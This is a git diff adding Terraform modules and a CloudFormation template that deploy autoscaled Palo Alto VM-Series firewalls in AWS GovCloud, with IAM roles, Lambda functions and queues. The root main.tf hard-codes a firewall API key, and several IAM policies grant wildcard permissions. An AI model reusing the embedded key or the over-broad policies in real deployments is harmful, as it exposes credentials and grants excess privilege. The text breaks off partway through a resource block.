diff --git a/aws/tgw_inbound_asg-GovCloud/bootstrap_files/init-cfg.txt b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/init-cfg.txt
new file mode 100644
index 00000000..c77f637b
--- /dev/null
+++ b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/init-cfg.txt
@@ -0,0 +1,10 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+dhcp-accept-server-hostname=yes
+dns-primary=8.8.8.8
+dns-secondary=4.2.2.2
+op-command-modes=mgmt-interface-swap
diff --git a/aws/tgw_inbound_asg-GovCloud/bootstrap_files/nlb.zip b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/nlb.zip
new file mode 100644
index 00000000..066e08bc
Binary files /dev/null and b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/nlb.zip differ
diff --git a/aws/tgw_inbound_asg-GovCloud/bootstrap_files/pan_nlb_lambda.template b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/pan_nlb_lambda.template
new file mode 100644
index 00000000..147b7f09
--- /dev/null
+++ b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/pan_nlb_lambda.template
@@ -0,0 +1,486 @@
+{
+  "AWSTemplateFormatVersion" : "2010-09-09",
+  "Description" : "Creates an AWS Network Load balancer, which multiplexes traffic to registered scaled out back end web servers",
+  "Parameters": {
+    "NLBName": {
+      "Type" : "String",
+      "Description": "Enter the name of the NLB",
+      "Default": "prot-nlb",
+      "MinLength" : "3",
+      "MaxLength" : "120"
+    },
+    "NLBARN": {
+      "Type" : "String",
+      "Description": "Enter the ARN of the NLB",
+      "Default": "prot-nlb",
+      "MinLength" : "3",
+      "MaxLength" : "150"
+    },
+    "QueueURL": {
+      "Type" : "String",
+      "Description": "Enter the URL of the Queue to send messages to",
+      "MinLength" : "3",
+      "MaxLength" : "1024"
+    },
+    "TableName": {
+      "Type" : "String",
+      "Default": "nlb_db_tbl",
+      "Description": "Enter the name of the database table",
+      "MinLength" : "3",
+      "MaxLength" : "120"
+    },
+    "S3BucketName": {
+      "Type" : "String",
+      "Description": "Enter the name of the S3 Bucket which contains the lambda code",
+      "MinLength" : "3",
+      "MaxLength" : "120"
+    },
+    "S3ObjectName": {
+      "Type" : "String",
+      "Default": "nlb.zip",
+      "Description": "Enter the name of the S3 object which contains the lambda code",
+      "MinLength" : "3",
+      "MaxLength" : "120"
+    },
+    "RoleARN": {
+      "Type": "String",
+      "Default": "",
+      "Description": "The ARN of the role to use for Cross Account Access",
+      "MaxLength" : "120"
+    },
+    "ExternalId": {
+      "Type": "String",
+      "Default": "",
+      "Description": "The external ID associated with the Cross Account Role",
+      "MaxLength" : "120"
+    },
+    "SameAccount": {
+      "Type": "String",
+      "Default": "true",
+      "Description": "Flag to indicate if the NLB will be deployed into the same account or a different one",
+      "AllowedValues": [
+        "true",
+        "false"
+      ]
+    }
+  },
+  "Metadata" : {
+    "AWS::CloudFormation::Interface" : {
+        "ParameterLabels" : {
+            "NLB ARN": {"Ref": "NLBARN"},
+            "NLB Name": {"Ref": "NLBNAME"},
+            "Queue URL": {"Ref": "QueueURL"},
+            "Table Name": {"Ref": "TableName"},
+            "Lambda S3 Bucket Name": {"Ref": "S3BucketName"},
+            "Lambda S3 Object Name": {"Ref": "S3ObjectName"}
+      }
+    }
+  },
+  "Conditions": {
+    "CreateCrossAccountRole": {"Fn::Equals" : [{"Ref": "SameAccount"}, "false"] },
+    "NoCrossAccountRole": {"Fn::Equals" : [{"Ref": "SameAccount"}, "true"] }
+  },
+  "Resources": {
+    "LambdaExecutionRole0" : {
+        "Type": "AWS::IAM::Role",
+        "Condition": "NoCrossAccountRole",
+        "Properties": {
+            "AssumeRolePolicyDocument": {
+               "Version": "2012-10-17",
+               "Statement": [ {
+                 "Effect": "Allow",
+                 "Principal": {
+                    "Service": "lambda.amazonaws.com"
+                },
+                "Action": "sts:AssumeRole"
+              } ]
+            },
+            "Path":"/",
+            "Policies": [ {
+              "PolicyName": "LambdaExecutionRolePolicy",
+              "PolicyDocument":{
+                "Version": "2012-10-17",
+                "Statement": [
+                {
+                    "Effect": "Allow",
+                    "Action": "s3:ListBucket",
+                    "Resource": { "Fn::Join": [ "", [ "arn:aws-us-gov:s3:::", {"Ref": "S3BucketName" }, "/*" ] ] }
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": "s3:GetObject",
+                    "Resource": { "Fn::Join": [ "", [ "arn:aws-us-gov:s3:::", { "Ref": "S3BucketName" }, "/*" ] ] }
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "ec2:DescribeSubnets"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "events:*"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "cloudwatch:*"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "lambda:AddPermission",
+                        "lambda:CreateEventSourceMapping",
+                        "lambda:CreateFunction",
+                        "lambda:DeleteEventSourceMapping",
+                        "lambda:DeleteFunction",
+                        "lambda:GetEventSourceMapping",
+                        "lambda:ListEventSourceMappings",
+                        "lambda:RemovePermission",
+                        "lambda:UpdateEventSourceMapping",
+                        "lambda:UpdateFunctionCode",
+                        "lambda:UpdateFunctionConfiguration",
+                        "lambda:GetFunction",
+                        "lambda:ListFunctions"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "sqs:ReceiveMessage",
+                        "sqs:SendMessage",
+                        "sqs:SetQueueAttributes",
+                        "sqs:PurgeQueue"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "elasticloadbalancing:AddTags",
+                        "elasticloadbalancing:AttachLoadBalancerToSubnets",
+                        "elasticloadbalancing:ConfigureHealthCheck",
+                        "elasticloadbalancing:DescribeInstanceHealth",
+                        "elasticloadbalancing:DescribeLoadBalancerAttributes",
+                        "elasticloadbalancing:DescribeLoadBalancerPolicyTypes",
+                        "elasticloadbalancing:DescribeLoadBalancerPolicies",
+                        "elasticloadbalancing:DescribeLoadBalancers",
+                        "elasticloadbalancing:DescribeTags",
+                        "elasticloadbalancing:DetachLoadBalancerFromSubnets",
+                        "elasticloadbalancing:ModifyLoadBalancerAttributes",
+                        "elasticloadbalancing:RemoveTags"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "iam:PassRole",
+                        "iam:GetRole"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                  "Effect": "Allow",
+                  "Action": ["logs:CreateLogGroup","logs:CreateLogStream","logs:PutLogEvents"],
+                  "Resource": "arn:aws-us-gov:logs:*:*:*"
+                },
+                {
+                  "Effect": "Allow",
+                  "Action": ["cloudformation:DescribeStacks"],
+                  "Resource": "*"
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "logs:CreateLogGroup",
+                        "logs:CreateLogStream",
+                        "logs:PutDestination",
+                        "logs:PutDestinationPolicy",
+                        "logs:PutLogEvents",
+                        "logs:PutMetricFilter"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "dynamodb:CreateTable",
+                        "dynamodb:DeleteItem",
+                        "dynamodb:DeleteTable",
+                        "dynamodb:GetItem",
+                        "dynamodb:PutItem"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                }
+                ]
+              }}]}
+    },
+    "LambdaExecutionRole1" : {
+        "Type": "AWS::IAM::Role",
+        "Condition": "CreateCrossAccountRole",
+        "Properties": {
+            "AssumeRolePolicyDocument": {
+               "Version": "2012-10-17",
+               "Statement": [ {
+                 "Effect": "Allow",
+                 "Principal": {
+                    "Service": "lambda.amazonaws.com"
+                },
+                "Action": "sts:AssumeRole"
+              } ]
+            },
+            "Path":"/",
+            "Policies": [ {
+              "PolicyName": "LambdaExecutionRolePolicy",
+              "PolicyDocument":{
+                "Version": "2012-10-17",
+                "Statement": [
+                {
+                    "Effect": "Allow",
+                    "Action": "sts:AssumeRole",
+                    "Resource": {"Ref": "RoleARN"}
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": "s3:ListBucket",
+                    "Resource": { "Fn::Join": [ "", [ "arn:aws-us-gov:s3:::", {"Ref": "S3BucketName" }, "/*" ] ] }
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": "s3:GetObject",
+                    "Resource": { "Fn::Join": [ "", [ "arn:aws-us-gov:s3:::", { "Ref": "S3BucketName" }, "/*" ] ] }
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "ec2:DescribeSubnets"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "events:*"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "cloudwatch:*"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "lambda:AddPermission",
+                        "lambda:CreateEventSourceMapping",
+                        "lambda:CreateFunction",
+                        "lambda:DeleteEventSourceMapping",
+                        "lambda:DeleteFunction",
+                        "lambda:GetEventSourceMapping",
+                        "lambda:ListEventSourceMappings",
+                        "lambda:RemovePermission",
+                        "lambda:UpdateEventSourceMapping",
+                        "lambda:UpdateFunctionCode",
+                        "lambda:UpdateFunctionConfiguration",
+                        "lambda:GetFunction",
+                        "lambda:ListFunctions"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "sqs:ReceiveMessage",
+                        "sqs:SendMessage",
+                        "sqs:SetQueueAttributes",
+                        "sqs:PurgeQueue"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "elasticloadbalancing:AddTags",
+                        "elasticloadbalancing:AttachLoadBalancerToSubnets",
+                        "elasticloadbalancing:ConfigureHealthCheck",
+                        "elasticloadbalancing:DescribeInstanceHealth",
+                        "elasticloadbalancing:DescribeLoadBalancerAttributes",
+                        "elasticloadbalancing:DescribeLoadBalancerPolicyTypes",
+                        "elasticloadbalancing:DescribeLoadBalancerPolicies",
+                        "elasticloadbalancing:DescribeLoadBalancers",
+                        "elasticloadbalancing:DescribeTags",
+                        "elasticloadbalancing:DetachLoadBalancerFromSubnets",
+                        "elasticloadbalancing:ModifyLoadBalancerAttributes",
+                        "elasticloadbalancing:RemoveTags"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "iam:PassRole",
+                        "iam:GetRole"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                  "Effect": "Allow",
+                  "Action": ["logs:CreateLogGroup","logs:CreateLogStream","logs:PutLogEvents"],
+                  "Resource": "arn:aws-us-gov:logs:*:*:*"
+                },
+                {
+                  "Effect": "Allow",
+                  "Action": ["cloudformation:DescribeStacks"],
+                  "Resource": "*"
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "logs:CreateLogGroup",
+                        "logs:CreateLogStream",
+                        "logs:PutDestination",
+                        "logs:PutDestinationPolicy",
+                        "logs:PutLogEvents",
+                        "logs:PutMetricFilter"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "dynamodb:CreateTable",
+                        "dynamodb:DeleteItem",
+                        "dynamodb:DeleteTable",
+                        "dynamodb:GetItem",
+                        "dynamodb:PutItem"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                }
+                ]
+              }}]}
+    },
+    "NLBDeployerLambda0" : {
+        "Type": "AWS::Lambda::Function",
+        "Condition": "NoCrossAccountRole",
+        "Properties": {
+            "Handler": "nlb_deployer.nlb_deploy_handler",
+            "Role": {"Fn::GetAtt" :
+                      ["LambdaExecutionRole0",
+                        "Arn"
+                      ]
+            },
+            "Code": {
+                "S3Bucket": { "Ref": "S3BucketName"},
+                "S3Key": { "Ref": "S3ObjectName"}
+            },
+        "Runtime": "python2.7",
+        "Timeout": "300"
+      }
+    },
+    "NLBDeployerLambda1" : {
+        "Type": "AWS::Lambda::Function",
+        "Condition": "CreateCrossAccountRole",
+        "Properties": {
+            "Handler": "nlb_deployer.nlb_deploy_handler",
+            "Role": {"Fn::GetAtt" :
+                      ["LambdaExecutionRole1",
+                        "Arn"
+                      ]
+            },
+            "Code": {
+                "S3Bucket": { "Ref": "S3BucketName"},
+                "S3Key": { "Ref": "S3ObjectName"}
+            },
+        "Runtime": "python2.7",
+        "Timeout": "300"
+      }
+    },
+    "LambdaCustomResource0": {
+        "Type": "AWS::CloudFormation::CustomResource",
+        "Condition": "NoCrossAccountRole",
+        "Version" : "1.0",
+        "DependsOn": ["NLBDeployerLambda0"],
+         "Properties" : {
+             "ServiceToken": { "Fn::GetAtt" : ["NLBDeployerLambda0", "Arn"] },
+             "StackName": {"Ref": "AWS::StackName"},
+             "Region": {"Ref": "AWS::Region"},
+             "table_name": {"Ref": "TableName"},
+             "NLB-ARN": {"Ref": "NLBARN"},
+             "NLB-NAME": {"Ref": "NLBName"},
+             "LambdaExecutionRole": {"Ref": "LambdaExecutionRole0"},
+             "S3BucketName": {"Ref": "S3BucketName"},
+             "S3ObjectName": {"Ref": "S3ObjectName"},
+             "QueueURL": {"Ref": "QueueURL"},
+             "RoleARN": {"Ref": "RoleARN"},
+             "ExternalId": {"Ref": "ExternalId"}
+         }
+    },
+    "LambdaCustomResource1": {
+        "Type": "AWS::CloudFormation::CustomResource",
+        "Condition": "CreateCrossAccountRole",
+        "Version" : "1.0",
+        "DependsOn": ["NLBDeployerLambda1"],
+         "Properties" : {
+             "ServiceToken": { "Fn::GetAtt" : ["NLBDeployerLambda1", "Arn"] },
+             "StackName": {"Ref": "AWS::StackName"},
+             "Region": {"Ref": "AWS::Region"},
+             "table_name": {"Ref": "TableName"},
+             "NLB-ARN": {"Ref": "NLBARN"},
+             "NLB-NAME": {"Ref": "NLBName"},
+             "LambdaExecutionRole": {"Ref": "LambdaExecutionRole1"},
+             "S3BucketName": {"Ref": "S3BucketName"},
+             "S3ObjectName": {"Ref": "S3ObjectName"},
+             "QueueURL": {"Ref": "QueueURL"},
+             "RoleARN": {"Ref": "RoleARN"},
+             "ExternalId": {"Ref": "ExternalId"}
+         }
+    }
+  }
+}
diff --git a/aws/tgw_inbound_asg-GovCloud/bootstrap_files/panw-aws.zip b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/panw-aws.zip
new file mode 100644
index 00000000..83dbc829
Binary files /dev/null and b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/panw-aws.zip differ
diff --git a/aws/tgw_inbound_asg-GovCloud/diagram.png b/aws/tgw_inbound_asg-GovCloud/diagram.png
new file mode 100644
index 00000000..59f6541c
Binary files /dev/null and b/aws/tgw_inbound_asg-GovCloud/diagram.png differ
diff --git a/aws/tgw_inbound_asg-GovCloud/main.tf b/aws/tgw_inbound_asg-GovCloud/main.tf
new file mode 100644
index 00000000..28726fb0
--- /dev/null
+++ b/aws/tgw_inbound_asg-GovCloud/main.tf
@@ -0,0 +1,87 @@
+/*
+                                              SUPPORT POLICY
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. 
+These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as 
+and when possible. We do not provide technical support or help in using or troubleshooting the components of 
+the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized 
+Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) 
+by the scripts or templates are still supported, but the support is only for the product functionality and 
+not for help in deploying or using the template or script itself. Unless explicitly tagged, all projects or 
+work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official 
+Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
+*/
+
+#-----------------------------------------------------------------------------------------------------------------
+# CREATE INBOUND SECURITY VPC
+module "vpc_in" {
+  source       = "./modules/vpc_in/"
+  tag          = "${var.tag}"
+  region       = "${var.region}"
+  tgw_id       = "${var.tgw_id}"
+  tgw_rtb_id   = "${var.tgw_rtb_id}"
+  cidr_vpc     = "10.255.0.0/16"
+  azs          = ["us-gov-west-1a", "us-gov-west-1b"]
+  cidr_mgmt    = ["10.255.0.0/28", "10.255.0.16/28"]
+  cidr_untrust = ["10.255.1.0/28", "10.255.1.16/28"]
+  cidr_trust   = ["10.255.2.0/28", "10.255.2.16/28"]
+  cidr_tgw     = ["10.255.3.0/28", "10.255.3.16/28"]
+  cidr_natgw   = ["10.255.4.0/28", "10.255.4.16/28"]
+  cidr_lambda  = ["10.255.5.0/28", "10.255.5.16/28"]
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# CREATE S3 BUCKET FOR VM-SERIES BOOTSTRAP
+module "s3_in" {
+  source = "./modules/s3_bootstrap/"
+
+  file_location      = "bootstrap_files/"
+  bucket_name        = "fw-tgw-inbound-demo"
+  bucket_name_random = true
+  config             = ["bootstrap.xml", "init-cfg.txt"]
+  license            = ["authcodes"]
+  content            = []
+  software           = []
+  other              = ["panw-aws.zip", "pan_nlb_lambda.template", "nlb.zip"]
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# DEPLOY VM-SERIES AUTOSCALE GROUP
+module "fw_in" {
+  source = "./modules/fw_in_asg/"
+
+  tag              = "${var.tag}"
+  region           = "${var.region}"
+  vpc_id           = "${module.vpc_in.vpc_id}"
+  vpc_sg_id        = "${module.vpc_in.default_security_group_id}"
+  lambda_bucket    = "${module.s3_in.bucket_name}"
+  lambda_subnet_id = "${module.vpc_in.lambda_id}"
+  natgw_subnet_id  = "${module.vpc_in.natgw_id}"
+
+  fw_key_name             = "${var.key_name}"
+  fw_bucket               = "${module.s3_in.bucket_name}"
+  fw_ami                  = "${var.fw_ami}"
+  fw_vm_type              = "m4.xlarge"
+  fw_sg_source            = "${var.fw_sg_source}"
+  fw_subnet0_id           = "${module.vpc_in.mgmt_id}"
+  fw_subnet1_id           = "${module.vpc_in.untrust_id}"
+  fw_subnet2_id           = "${module.vpc_in.trust_id}"
+  fw_min_instances        = "1"                           // FOR EACH AZ
+  fw_max_instances        = "2"                           // FOR EACH AZ
+  fw_scale_threshold_up   = "80"
+  fw_scale_threshold_down = "20"
+  fw_scale_parameter      = "DataPlaneCPUUtilizationPct"
+  fw_scale_period         = "900"
+
+  api_key_firewall  = "LUFRPT1Zd2pYUGpkMUNrVEZlb3hROEQyUm95dXNGRkU9N0d4RGpTN2VZaVZYMVVoS253U0p6dlk3MkM0SDFySEh2UUR4Y3hzK2g3ST0="
+  api_key_panorama  = ""
+  api_key_delicense = ""
+
+  enable_debug = "No"
+
+  dependencies = [
+    "${module.s3_in.completion}",
+  ]
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+
diff --git a/aws/tgw_inbound_asg-GovCloud/modules/fw_in_asg/main.tf b/aws/tgw_inbound_asg-GovCloud/modules/fw_in_asg/main.tf
new file mode 100644
index 00000000..ff8c4a24
--- /dev/null
+++ b/aws/tgw_inbound_asg-GovCloud/modules/fw_in_asg/main.tf
@@ -0,0 +1,810 @@
+resource "null_resource" "dependency_getter" {
+  provisioner "local-exec" {
+    command = "echo ${length(var.dependencies)}"
+  }
+}
+
+resource "random_string" "randomstring" {
+  length      = 6
+  min_upper   = 4
+  min_numeric = 2
+  special     = false
+}
+
+resource "aws_iam_role" "FirewallBootstrapRole" {
+  name = "${var.tag}-vmseries-${random_string.randomstring.result}"
+
+  assume_role_policy = <<EOF
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Principal": {
+      "Service": "ec2.amazonaws.com"
+    },
+      "Action": "sts:AssumeRole"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_instance_profile" "FirewallBootstrapInstanceProfile" {
+  name = "${var.tag}-FirewallInstanceProfile-${random_string.randomstring.result}"
+  role = "${aws_iam_role.FirewallBootstrapRole.name}"
+  path = "/"
+}
+
+resource "aws_iam_role_policy" "FirewallBootstrapRolePolicy" {
+  name = "${var.tag}-FirewallRolePolicy-${random_string.randomstring.result}"
+  role = "${aws_iam_role.FirewallBootstrapRole.id}"
+
+  depends_on = [
+    "null_resource.dependency_getter",
+  ]
+
+  policy = <<EOF
+{
+  "Version" : "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Action": "s3:ListBucket",
+      "Resource": "arn:aws-us-gov:s3:::${var.fw_bucket}"
+    },
+    {
+      "Effect": "Allow",
+      "Action": "s3:GetObject",
+      "Resource": "arn:aws-us-gov:s3:::${var.fw_bucket}/*"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_role" "LambdaExecutionRole" {
+  name = "${var.tag}-LambdaExecutionRole-${random_string.randomstring.result}"
+  path = "/"
+
+  assume_role_policy = <<EOF
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Action": "sts:AssumeRole",
+      "Principal": {
+        "Service": "lambda.amazonaws.com"
+      },
+      "Effect": "Allow",
+      "Sid": ""
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_role_policy" "LambdaExecutionRolePolicy" {
+  name = "${var.tag}-LambdaExecutionRolePolicy-${random_string.randomstring.result}"
+  role = "${aws_iam_role.LambdaExecutionRole.id}"
+
+  depends_on = [
+    "null_resource.dependency_getter",
+  ]
+
+  policy = <<EOF
+{
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+          "Effect": "Allow",
+          "Action": "s3:ListBucket",
+          "Resource": "arn:aws-us-gov:s3:::${var.fw_bucket}"
+        },
+        {
+          "Effect": "Allow",
+          "Action": "s3:GetObject",
+          "Resource": "arn:aws-us-gov:s3:::${var.fw_bucket}/*"
+        },
+        {
+            "Effect": "Allow",
+            "Action": [
+                "ec2:AllocateAddress",
+                "ec2:AssociateAddress",
+                "ec2:AssociateRouteTable",
+                "ec2:AttachInternetGateway",
+                "ec2:AttachNetworkInterface",
+                "ec2:CreateNetworkInterface",
+                "ec2:CreateTags",
+                "ec2:DeleteNetworkInterface",
+                "ec2:DeleteRouteTable",
+                "ec2:DeleteSecurityGroup",
+                "ec2:DeleteTags",
+                "ec2:DescribeAddresses",
+                "ec2:DescribeAvailabilityZones",
+                "ec2:DescribeInstanceAttribute",
+                "ec2:DescribeInstanceStatus",
+                "ec2:DescribeInstances",
+                "ec2:DescribeImages",
+                "ec2:DescribeNatGateways",
+                "ec2:DescribeNetworkInterfaceAttribute",
+                "ec2:DescribeNetworkInterfaces",
+                "ec2:DescribeTags",
+                "ec2:DescribeVpcEndpoints",
+                "ec2:DescribeVpcs",
+                "ec2:DescribeSubnets",
+                "ec2:DescribeSecurityGroups",
+                "ec2:DetachInternetGateway",
+                "ec2:DetachNetworkInterface",
+                "ec2:DetachVolume",
+                "ec2:DisassociateAddress",
+                "ec2:DisassociateRouteTable",
+                "ec2:ModifyNetworkInterfaceAttribute",
+                "ec2:ModifySubnetAttribute",
+                "ec2:MonitorInstances",
+                "ec2:RebootInstances",
+                "ec2:ReleaseAddress",
+                "ec2:ReportInstanceStatus",
+                "ec2:TerminateInstances",
+                "ec2:DescribeIdFormat"
+            ],
+            "Resource": [
+                "*"
+            ]
+        },
+        {
+            "Effect": "Allow",
+            "Action": [
+                "events:*"
+            ],
+            "Resource": [
+                "*"
+            ]
+        },
+        {
+            "Effect": "Allow",
+            "Action": [
+                "cloudwatch:*"
+            ],
+            "Resource": [
+                "*"
+            ]
+        },
+        {
+            "Effect": "Allow",
+            "Action": [
+                "lambda:AddPermission",
+                "lambda:CreateEventSourceMapping",
+                "lambda:CreateFunction",
+                "lambda:DeleteEventSourceMapping",
+                "lambda:DeleteFunction",
+                "lambda:GetEventSourceMapping",
+                "lambda:ListEventSourceMappings",
+                "lambda:RemovePermission",
+                "lambda:UpdateEventSourceMapping",
+                "lambda:UpdateFunctionCode",
+                "lambda:UpdateFunctionConfiguration",
+                "lambda:GetFunction",
+                "lambda:ListFunctions"
+            ],
+            "Resource": [
+                "*"
+            ]
+        },
+        {
+            "Effect": "Allow",
+            "Action": [
+                "autoscaling:*"
+            ],
+            "Resource": [
+                "*"
+            ]
+        },
+        {
+            "Effect": "Allow",
+            "Action": [
+                "sqs:ReceiveMessage",
+                "sqs:SendMessage",
+                "sqs:SetQueueAttributes",
+                "sqs:PurgeQueue",
+                "sqs:DeleteMessage"
+            ],
+            "Resource": [
+                "*"
+            ]
+        },
+        {
+            "Effect": "Allow",
+            "Action": [
+                "elasticloadbalancing:AddTags",
+                "elasticloadbalancing:AttachLoadBalancerToSubnets",
+                "elasticloadbalancing:ConfigureHealthCheck",
+                "elasticloadbalancing:DescribeInstanceHealth",
+                "elasticloadbalancing:DescribeLoadBalancerAttributes",
+                "elasticloadbalancing:DescribeLoadBalancerPolicyTypes",
+                "elasticloadbalancing:DescribeLoadBalancerPolicies",
+                "elasticloadbalancing:DescribeLoadBalancers",
+                "elasticloadbalancing:DescribeTags",
+                "elasticloadbalancing:DetachLoadBalancerFromSubnets",
+                "elasticloadbalancing:ModifyLoadBalancerAttributes",
+                "elasticloadbalancing:RemoveTags",
+                "elasticloadbalancing:DescribeTargetGroups"
+            ],
+            "Resource": [
+                "*"
+            ]
+        },
+        {
+            "Effect": "Allow",
+            "Action": [
+                "iam:PassRole",
+                "iam:GetRole"
+            ],
+            "Resource": [
+                "*"
+            ]
+        },
+        {
+            "Effect": "Allow",
+            "Action": [
+                "logs:CreateLogGroup",
+                "logs:CreateLogStream",
+                "logs:PutLogEvents"
+            ],
+            "Resource": "arn:aws-us-gov:logs:*:*:*"
+        },
+        {
+            "Effect": "Allow",
+            "Action": [
+                "cloudformation:DescribeStacks"
+            ],
+            "Resource": "*"
+        },
+        {
+            "Effect": "Allow",
+            "Action": [
+                "logs:CreateLogGroup",
+                "logs:CreateLogStream",
+                "logs:PutDestination",
+                "logs:PutDestinationPolicy",
+                "logs:PutLogEvents",
+                "logs:PutMetricFilter"
+            ],
+            "Resource": [
+                "*"
+            ]
+        },
+        {
+            "Effect": "Allow",
+            "Action": "dynamodb:*",
+            "Resource": "arn:aws-us-gov:dynamodb:*:*:*"
+        }
+    ]
+}
+EOF
+}
+
+resource "aws_lambda_function" "FwInit" {
+  function_name = "${var.tag}-FwInit-${random_string.randomstring.result}"
+  handler       = "fw_init.lambda_handler"
+  role          = "${aws_iam_role.LambdaExecutionRole.arn}"
+  s3_bucket     = "${var.lambda_bucket}"
+  s3_key        = "${var.KeyMap["Key"]}"
+  runtime       = "python2.7"
+  timeout       = "300"
+
+  vpc_config {
+    subnet_ids         = ["${var.lambda_subnet_id}"]
+    security_group_ids = ["${var.vpc_sg_id}"]
+  }
+
+  depends_on = [
+    "null_resource.dependency_getter",
+  ]
+}
+
+resource "aws_sqs_queue" "LambdaENIQueue" {
+  name = "${var.tag}-LambdaENIQueue-${random_string.randomstring.result}"
+
+  depends_on = [
+    "aws_lambda_function.InitLambda",
+  ]
+}
+
+resource "aws_sns_topic" "LambdaENISNSTopic" {
+  name = "${var.tag}-LambdaENISNSTopic-${random_string.randomstring.result}"
+
+  depends_on = [
+    "aws_lambda_function.FwInit",
+  ]
+}
+
+resource "aws_sns_topic_subscription" "LambdaENISNSTopicSubscription" {
+  topic_arn = "${aws_sns_topic.LambdaENISNSTopic.arn}"
+  endpoint  = "${aws_lambda_function.FwInit.arn}"
+  protocol  = "lambda"
+
+  depends_on = [
+    "aws_lambda_function.FwInit",
+  ]
+}
+
+resource "aws_lambda_permission" "LambdaENIPermission" {
+  statement_id  = "ProvideLambdawithPermissionstoSNS"
+  action        = "lambda:InvokeFunction"
+  function_name = "${aws_lambda_function.FwInit.arn}"
+  principal     = "sns.amazonaws.com"
+  source_arn    = "${aws_sns_topic.LambdaENISNSTopic.arn}"
+
+  depends_on = [
+    "aws_lambda_function.FwInit",
+    "aws_sns_topic.LambdaENISNSTopic",
+  ]
+}
+
+resource "aws_sqs_queue" "NetworkLoadBalancerQueue" {
+  name = "${var.tag}-NetworkLoadBalancerQueue-${random_string.randomstring.result}"
+}
+
+resource "aws_iam_role" "ASGNotifierRole" {
+  name = "${var.tag}-ASGNotifierRole-${random_string.randomstring.result}"
+  path = "/"
+
+  assume_role_policy = <<EOF
+{
+    "Version" : "2012-10-17",
+    "Statement": [{
+    "Effect": "Allow",
+    "Principal": {
+        "Service": ["autoscaling.amazonaws.com"]
+    },
+    "Action": ["sts:AssumeRole"]
+    }]
+}
+EOF
+}
+
+resource "aws_iam_role_policy" "ASGNotifierRolePolicy" {
+  name = "${var.tag}-ASGNotifierRolePolicy-${random_string.randomstring.result}"
+  role = "${aws_iam_role.ASGNotifierRole.id}"
+
+  depends_on = [
+    "aws_sns_topic.LambdaENISNSTopic",
+  ]
+
+  policy = <<EOF
+{
+    "Version" : "2012-10-17",
+    "Statement": [{
+    "Effect": "Allow",
+    "Action": "sns:Publish",
+    "Resource": "${aws_sns_topic.LambdaENISNSTopic.arn}"
+    }]
+}
+EOF
+}
+
+resource "aws_lambda_function" "InitLambda" {
+  function_name = "${var.tag}-InitLambda-${random_string.randomstring.result}"
+  handler       = "init.lambda_handler"
+  role          = "${aws_iam_role.LambdaExecutionRole.arn}"
+  s3_bucket     = "${var.lambda_bucket}"
+  s3_key        = "${var.KeyMap["Key"]}"
+  runtime       = "python2.7"
+  timeout       = "300"
+
+  depends_on = [
